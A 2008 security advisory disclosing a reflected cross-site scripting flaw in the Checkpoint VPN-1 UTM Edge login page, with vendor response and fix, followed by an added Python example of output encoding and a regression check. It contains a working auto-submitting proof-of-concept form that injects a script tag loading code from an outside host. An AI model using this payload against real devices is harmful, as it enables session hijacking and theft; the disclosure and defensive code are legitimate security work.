checkpoint_080306.txt

12 Mar 2008 00:00:00, reported by Henri Lindberg. Type: packetstorm. Source: packetstormsecurity.com

Checkpoint VPN-1 UTM Edge cross-site scripting vulnerability in version 7.0.48x

Code
` Louhi Networks  
Security Advisory  
  
  
Advisory: Checkpoint VPN-1 UTM Edge cross-site scripting  
Release Date: 2008/03/06  
Last Modified: 2008/03/06  
Authors: Henri Lindberg, Associate of (ISC)²  
[[email protected]]  
  
Application: Checkpoint VPN-1 Edge W Embedded NGX 7.0.48x  
(patched in version 7.5.48)  
Devices: Checkpoint VPN-1 UTM Edge  
Attack type: Cross site scripting (non-persistent)  
Risk: Low  
Vendor Status: Vendor has released an updated version  
References: http://www.louhi.fi/advisory/checkpoint_080306.txt  
  
  
Overview:  
  
Quote from http://www.checkpoint.com/  
"VPN-1 UTM Edge appliances deliver unified threat management to  
enterprises with branch offices and simplify security deployments  
and manageability. VPN-1 UTM Edge appliances consolidate proven  
enterprise-class technology into a single branch office solution  
that does not compromise the corporate network and eliminates the  
branch office as your weakest link. As part of Check Point's Unified  
Security Architecture, VPN-1 UTM Edge can enforce a global security  
policy and allows administrators to manage and update thousands of  
appliances as easily as managing one."  
  
Insufficient input validation and output encoding on the login page  
allow an attacker to perform HTML injection by posting a suitable string  
to the login form handler. The injection leads to reflected  
pre-authentication cross-site scripting.  
  
  
Details:  
Form-based authentication is used only when the device is accessed over  
HTTP. Authentication over HTTPS uses HTTP basic authentication.  
  
The device does not accept the parameters in a GET request; a POST  
request has to be used instead. Exploiting the XSS vulnerability  
therefore requires a bit more effort than an ordinary GET-based  
reflected cross-site scripting vulnerability.  
  
The current version can be checked at  
http://xxx.xxx.xxx.xxx/pub/test.html, where xxx.xxx.xxx.xxx is the LAN IP  
address of the device. The page also displays the current product key.  
  
Vendor response:  
  
"Once users register the appliance and connect to the service center  
(Safe@Office appliances), the latest firmware is automatically  
downloaded to their appliance. For UTM-1 Edge appliances, the latest  
firmware version can be downloaded from the Check Point download  
center. Currently, this is version 7.5.48 that does not contain the  
reported issue. We believe that customers are not exposed to this  
issue."  
  
Proof of Concept:  
  
<html>  
<body onload="document.f.submit()">  
<form name="f" method="post" action="http://192.168.10.1"  
style="display:none">  
  
<input name="user" value="'<script/src=//l7.fi></script>">  
  
</form>  
</body>  
</html>  
  
  
  
Solution:  
  
Update to version 7.5.48  
  
  
Disclosure Timeline:  
  
19. February 2008 - Contacted Checkpoint by email  
20. February 2008 - Vendor response.  
6. March 2008 - Advisory was released  
  
Copyright 2008 Louhi Networks Oy. All rights reserved.  
`
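
The missing output encoding and input validation named in the advisory's overview, shown as an added example that is not part of the advisory or of the vendor's code. The page template, the account-name pattern and all function names are assumptions made for illustration; the advisory does not show the device's markup.

```python
import html
import re
from html.parser import HTMLParser

# Constructed stand-in for a login page that echoes the posted "user" field.
# The advisory does not show the device's real markup.
PAGE = "<html><body><p>Login failed for user: {user}</p></body></html>"
# Value of the "user" field in the advisory's proof of concept.
POC_USER = "'<script/src=//l7.fi></script>"
# Assumed account-name policy for the allow-list check (hypothetical).
USER_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")

def render_unsafe(user: str) -> str:
    """Reflects the field verbatim, the behaviour the advisory describes."""
    return PAGE.format(user=user)

def render_encoded(user: str) -> str:
    """Output encoding: HTML metacharacters become character references."""
    return PAGE.format(user=html.escape(user, quote=True))

def render_validated(user: str) -> str:
    """Input validation plus encoding: a non-conforming name is not echoed."""
    shown = user if USER_RE.fullmatch(user) else "(invalid user name)"
    return PAGE.format(user=html.escape(shown, quote=True))

class TagCollector(HTMLParser):
    """Records every start tag a parser sees in the response."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def injected_tags(page: str) -> list:
    """Start tags present in the response but absent from the template."""
    parser = TagCollector()
    parser.feed(page)
    parser.close()
    return [t for t in parser.tags if t[0] not in ("html", "body", "p")]

if __name__ == "__main__":
    for render in (render_unsafe, render_encoded, render_validated):
        print(render.__name__, injected_tags(render(POC_USER)))
```

`injected_tags` can serve as a regression check on a login handler's responses: any element that is not in the template means the reflected field reached the page unencoded.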
